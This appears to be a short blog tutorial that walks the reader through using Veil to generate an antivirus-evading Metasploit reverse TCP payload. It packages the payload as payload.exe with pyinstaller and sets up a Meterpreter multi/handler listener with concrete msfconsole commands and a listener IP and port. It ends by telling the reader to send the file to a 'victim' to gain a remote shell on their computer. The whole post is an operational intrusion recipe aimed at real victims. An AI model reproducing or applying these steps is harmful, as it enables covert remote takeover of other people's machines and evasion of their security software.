Veil is a tool designed to
generate metasploit payloads that bypass common anti-virus solutions.
Now Install Python 2.7.5 in
your pc
Now open Veil Folder and run
./Veil.py and choose option 1
You
can choose Metasploit’s standard msfvenom shellcode. I just chose the default,
msfvenom
Now you can choose the type
of payload, I just chose reverse TCP. Then enter the IP address of the Kali
system and the port you want to use
Now select option 1 pyinstaller
This file should be placed in the \root\Desktop\Veil\dist\payload.exe
Open
Kali terminal type msfconsole
Now
we need to set up a listener to handle reverse connection sent by victim when
the exploit successfully executed.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.174
set lport 4444
exploit
Now
send your payload.exe files
to victim, as soon as they download and open it. Now you can access meterpreter
shell on victim computer.
0 comments:
Post a Comment